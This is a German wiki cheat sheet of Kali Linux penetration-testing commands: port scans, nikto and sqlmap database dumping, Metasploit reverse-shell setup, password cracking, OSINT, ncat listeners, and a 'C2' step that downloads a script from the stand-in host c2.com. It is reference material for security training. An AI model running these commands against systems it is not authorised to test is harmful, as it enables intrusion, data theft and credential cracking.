Kali 2026 Cyber Security - Sheet Cheat

Aus Xinux Wiki

Version vom 14. Juni 2026, 19:18 Uhr von Thomas.will (Diskussion | Beiträge) (Die Seite wurde neu angelegt: „= Kali Linux 2026 – Cheat Sheet = Übersicht der wichtigsten Kommandos für Ethical Hacking und Penetration Testing, gruppiert nach Phasen. {{Hinweis|Alle…“)

(Unterschied) ← Nächstältere Version | Aktuelle Version (Unterschied) | Nächstjüngere Version → (Unterschied)

Zur Navigation springen Zur Suche springen

Kali Linux 2026 – Cheat Sheet

Übersicht der wichtigsten Kommandos für Ethical Hacking und Penetration Testing, gruppiert nach Phasen.

Vorlage:Hinweis

Network & Discovery

nmap

TCP-SYN-Scan (Stealth, halb offen)

nmap -sS <ziel>

Dienst- und Versionserkennung

nmap -sV <ziel>

Standard-NSE-Skripte ausführen

nmap -sC <ziel>

Aggressiver Scan (OS, Version, Skripte, Traceroute)

nmap -A <ziel>

Betriebssystem erkennen

nmap -O <ziel>

Alle 65535 TCP-Ports scannen

nmap -p- <ziel>

Schnelleres Timing

nmap -T4 <ziel>

Ausgabe im Normalformat speichern

nmap -oN scan.txt <ziel>

masscan

Port 80 im lokalen Subnetz scannen

masscan 192.168.1.0/24 -p80

SSH- und Web-Ports scannen

masscan 192.168.1.0/24 -p22,80,443

Voller TCP-Scan mit begrenzter Rate

masscan 192.168.1.0/24 -p1-65535 --rate 1000

Test-Host auf Web-Dienste prüfen

masscan scanme.nmap.org -p80,443

RDP in internen Bereichen suchen

masscan 10.0.0.0/8 -p3389 --rate 500

Banner von SMB-Zielen abgreifen

masscan 10.0.0.0/8 -p445 --banners

Gängige Dienst-Ports prüfen

masscan 172.16.0.0/16 -p21,22,80,443

Web Security & Auditing

nikto

Host scannen

nikto -h http://ziel.com

Bestimmten Port scannen

nikto -h http://ziel.com:8080

HTTPS-Scan erzwingen

nikto -h https://ziel.com -ssl

Interessante Dateien testen

nikto -h ziel.com -Tuning 1

Fehlkonfigurationen / Default-Dateien

nikto -h ziel.com -Tuning 2

Injection-Tests

nikto -h ziel.com -Tuning 4

Ziele aus Eingabedatei scannen

nikto -h hosts.txt

sqlmap

Automatischer (nicht-interaktiver) Test

sqlmap -u "https://url.com/i.php?id=1" --batch

Verfügbare Datenbanken auflisten

sqlmap -u "https://url.com/i.php?id=1" --dbs

Tabellen einer DB auflisten

sqlmap -u "https://url.com/i.php?id=1" -D shop --tables

Tabelleninhalt extrahieren

sqlmap -u "https://url.com/i.php?id=1" -D shop -T users --dump

Zufälligen User-Agent verwenden

sqlmap -u "https://url.com/i.php?id=1" --random-agent

Gespeicherten Request (z.B. aus Burp) verwenden

sqlmap -r request.txt

Vulnerability & Exploitation

Metasploit

Metasploit-Konsole starten

msfconsole

Module nach Stichwort suchen

search <stichwort>

Modul auswählen

use <modul>

Optionen des Moduls anzeigen

show options

Ziel setzen

set RHOSTS <ziel>

Eigene IP (für Reverse Shell) setzen

set LHOST <ip>

Modul ausführen

run / exploit

In Session wechseln

sessions -i <id>

Aktuelle Session in den Hintergrund

background

Web Fuzzing (wfuzz)

Verzeichnisse finden

wfuzz -w wordlist.txt http://ziel/FUZZ

Parameter finden

wfuzz -c -w wordlist.txt "http://ziel/?FUZZ=1"

Subdomains finden

wfuzz -c -w subs.txt -H "Host: FUZZ.ziel.com" http://ziel

Credential Auditing & Passwords

hashcat

Wörterbuchangriff (MD5)

hashcat -m 0 -a 0 hashes.txt rockyou.txt

Wörterbuchangriff (SHA1)

hashcat -m 100 -a 0 hashes.txt rockyou.txt

Wörterbuchangriff (NTLM)

hashcat -m 1000 -a 0 hashes.txt rockyou.txt

sha512crypt ($6$)

hashcat -m 1800 -a 0 hashes.txt rockyou.txt

Brute-Force-Maskenangriff

hashcat -m 0 -a 3 hashes.txt ?d?d?d?d?d?d

Hybrid: Wörterbuch + Maske

hashcat -m 0 -a 6 hashes.txt rockyou.txt ?d?d?d

Regelbasierter Angriff

hashcat -m 0 -a 0 -r rules/best64.rule hashes.txt rockyou.txt

Gespeicherte Session fortsetzen

hashcat --restore

John the Ripper

Unterstützte Hash-Formate auflisten

john --list=formats

Wörterbuchangriff

john --wordlist=rockyou.txt hashes.txt

Mangling-Regeln anwenden

john --rules --wordlist=words.txt hashes.txt

Inkrementeller Brute-Force

john --incremental hashes.txt

Single-Crack-Modus

john --single hashes.txt

Hash aus SSH-Schlüssel extrahieren

ssh2john id_rsa > id_rsa.hash

Geknackte Passwörter anzeigen

john --show hashes.txt

OSINT & Information Gathering

sherlock

Benutzernamen auf vielen Plattformen suchen

sherlock benutzer

Mehrere Benutzernamen prüfen

sherlock benutzer1 benutzer2

Auf bestimmte Seite einschränken

sherlock benutzer --site Twitter

Timeout pro Seite setzen

sherlock benutzer --timeout 5

Ergebnisse speichern

sherlock benutzer --output ergebnis.txt

Gefundene Profile im Browser öffnen

sherlock benutzer --browse

WHOIS & DNS

Domain-Details abfragen

whois ziel.com

IP zu Domain ermitteln

host ziel.com

Zonentransfer versuchen

dig ziel.com AXFR @ns1.ziel.com

Post-Exploitation & Networking Tools

ncat

TCP-Verbindung zu Port 80

ncat 192.168.1.10 80

UDP-Verbindung zu Port 53

ncat -u 192.168.1.10 53

Auf eingehende Verbindungen lauschen (mehrfach)

ncat -l -k 4444

Verbindung mit ausführlicher Ausgabe

ncat -v 192.168.1.10 22

Portscan 20–25

ncat -zv 192.168.1.10 20-25

Empfangene Daten in Datei schreiben

ncat -l 4444 > datei.txt

Verbindungs-Timeout 10 Sekunden

ncat -w 10 192.168.1.10 443

Data Transfer & C2

Datei herunterladen

curl -O http://c2.com/file.sh

Lokalen HTTP-Server starten

python3 -m http.server

Datei sicher kopieren

scp file.txt user@ziel:/pfad

Abgerufen von „http://xinux.net/index.php?title=Kali_2026_Cyber_Security_-_Sheet_Cheat&oldid=71028“